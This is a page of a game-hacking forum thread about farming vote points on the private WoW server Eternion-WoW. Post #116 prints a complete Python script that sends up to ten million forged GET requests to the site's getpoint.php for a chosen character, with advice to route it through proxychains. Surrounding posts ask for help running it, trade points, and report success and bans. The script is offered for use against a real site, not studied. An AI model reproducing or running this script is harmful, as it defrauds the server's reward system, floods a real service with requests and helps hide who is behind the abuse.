Eternion wow vote points public now... menu

User Tag List

Page 8 of 15 FirstFirst ... 456789101112 ... LastLast
Results 106 to 120 of 224
  1. #106
    ludterror's Avatar Member
    Reputation
    1
    Join Date
    Nov 2008
    Posts
    7
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ok,can you send me message with this site?,and explane me exacly what to do?I use python,and use 1 file named:votehack_3_updated_version .So I open it,and it says:Enter the Name to vote Exploit.I type my accound name:Ludterrorr and click Enter.Thank it says:Enter the realm ID to vote Exploit,and what shoud i ttype here?So i play in Eternion INS fun realm(that with instant 80 lvl and raiding for gear)I will +Rep+Rep+Rep+Rep+Rep !

    Eternion wow vote points public now...
  2. #107
    hackerlol's Avatar Admin(kind of) i miss Watcher
    Authenticator enabled
    Reputation
    1031
    Join Date
    Oct 2008
    Posts
    1,079
    Thanks G/R
    1257/300
    Trade Feedback
    1 (100%)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    look its right there realm id for eterion is 1

  3. #108
    Giggymog's Avatar Member
    Reputation
    1
    Join Date
    Feb 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    How do I do with this code?

  4. #109
    hypnotize191's Avatar Member
    Reputation
    2
    Join Date
    Jul 2007
    Posts
    30
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Can someone make a script for this server callofwow

    Ill +rep

  5. #110
    nickanzo's Avatar Member
    Reputation
    1
    Join Date
    Nov 2007
    Posts
    6
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Worked so good it got me banned, nice find though

  6. #111
    teneovestri23's Avatar Member
    Reputation
    2
    Join Date
    Mar 2009
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    alright i got python and got the .py file but when i open it python just opens and then closes immediately afterword... and thats it... can u help me out? i would rather understand prob and find solution, but if you want to just give me vote points the account is shapoobla23, its an alt account so let it rip.... I need thousands of points lol.... I have a friend who uses this and it works for them fine, i dont know what my problem is and im too new to this to figure it out on my own... yahoo is "teneovestri23" if you want to hit me up and help me out, leave a message... much thanks, this is an awesome deal yuh got goin on...

  7. #112
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If you get me Gold VIP on eternion WoW,then I can and will get you 10k Vote points.

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  8. #113
    teneovestri23's Avatar Member
    Reputation
    2
    Join Date
    Mar 2009
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    lol dude i would if i could but i dont have any way to pay for it... I cant even get me vip status... not until i get money to spend on this... oh an i can't reply to your message because i have'nt posted ten times yet... lol

  9. #114
    wowhunter69's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'm running this through Windows. I run the .py script and it gives me error "NameError: name 'Coolhunter' is not defined.

    Anyone know what I'm doing wrong?

  10. #115
    rosepp7's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    hi i have windows and i cant do it...
    can anyone do it for me please? just 500 points more if possible
    thx account name ---> dragonpp7

  11. #116
    djfauboy's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    abit slow, but works
    and thx for the quick response +rep
    btw here is a rapid fire link
    Free File Hosting Made Simple - MediaFire

    or copy this into notepad and save it with a .py extention

    Code:
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....

    from socket import *
    from time import sleep

    target = 'www.eternion-wow.com'
    port = 80
    request_pt1 = '/getpoint.php?url=xtremetop200&char='
    request_pt2 = '&sn=1234809692227'

    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    if(len(name) > 0):
    print('[-]Name : '+name)
    else:
    print('Name Its Empty??WTF....')
    exit(1)
    #top200
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n'
    count = 10000000
    print('[*]Requesting The Server ! This Maybe Take A Wile...')
    for i in range(0,int(count)):
    try:
    i = socket(AF_INET,SOCK_STREAM)
    except:
    print('[/]Error In SOcket Function')
    exit(1)
    try:
    i.connect((target,int(port)))
    except:
    print('[/]Error In Connect()')
    exit(1)
    try:
    i.send(server_request)
    except:
    print('[/]Error In Send()')
    exit(1)



    How i use it?

  12. #117
    djfauboy's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    WOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOW tnx a looooooooooooooot this reali work is cool man tnx again who don't understand leave a message and i tell how its work

  13. #118
    iamgodly523's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    6
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    How does it work??!?!?! I dont get what to do at all

  14. #119
    elitechris09's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    vote hack

    + rep if someone can do this for me name-elitechris09 thanx in advance

  15. #120
    Confucius's Avatar Super Moderator Don't Look Back in Anger

    CoreCoins Purchaser Authenticator enabled
    Reputation
    1418
    Join Date
    Oct 2007
    Posts
    2,810
    Thanks G/R
    302/311
    Trade Feedback
    7 (100%)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    guess what?! I was feeling generous so I did it for you chris... left it on for not to long though, maybe you have I dunno 600 vote points now? it gives u 5 every second

Page 8 of 15 FirstFirst ... 456789101112 ... LastLast

Similar Threads

  1. eternion-wow vote hack
    By supernova1 in forum WoW EMU Questions & Requests
    Replies: 2
    Last Post: 05-01-2010, 09:45 AM
  2. eternion-wow vote hack
    By supernova1 in forum WoW Bots Questions & Requests
    Replies: 1
    Last Post: 05-01-2010, 09:42 AM
  3. Eternion-wow vote points exploid.
    By ludterror in forum WoW EMU Exploits & Bugs
    Replies: 2
    Last Post: 04-02-2010, 12:46 PM
  4. Eternion-wow Vote Expolit
    By knazze in forum WoW EMU Exploits & Bugs
    Replies: 5
    Last Post: 12-03-2009, 05:24 AM
All times are GMT -5. The time now is 04:16 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search